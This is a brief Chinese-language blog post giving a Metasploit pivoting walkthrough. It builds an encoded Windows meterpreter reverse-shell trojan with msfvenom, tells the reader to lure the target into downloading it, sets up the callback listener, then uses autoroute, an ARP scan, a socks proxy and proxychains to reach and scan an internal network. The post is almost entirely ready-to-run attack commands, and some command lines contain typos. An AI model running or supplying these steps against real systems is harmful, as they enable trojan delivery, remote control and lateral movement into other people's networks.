pivotiing和自动路由


Pivotiing和自动路由

黑客(192.168.3.134)———-(192.168.3.133)server1(172.16.1.101)———-(172.16.1.102)server2

创建一个木马

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.3.134 lport=4444 -a x86 --platform windows -b "\x00\xff" -e x86/shikata_ga_nai -f exe > msf.exe
引诱对方下载
python -m SimpleHTTPServer 1234 

打开msfconsole

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lport 4444
set lhost 192.168.3.134
exploit

目标运行msf文件,就上线了

run get_local_sunets   \\收集信息,查看网段
run autoroute -s 172.16.1.0/24 \\设置静态路由
run post/windows/gather/arp_scanner RHOSTS=172.16.1.0/24  \\扫描网段
backgroud
sessions

使用另一个模块

use auxiliary/server/socks_proxy
show options
set srvhost 127.0.0.1
set srvport 10044
sett version 4a
run

另开一个窗口

nano /etc/proxychains4.conf
在里面最后一行加上socks4 127.0.0.1 10044
保存退出
然后就可以通过proxychains firefox访问内网了
也可以使用nmap扫描

文章作者: Broken-year
版权声明: 本博客所有文章除特別声明外,均采用 CC BY 4.0 许可协议。转载请注明来源 Broken-year !
  目录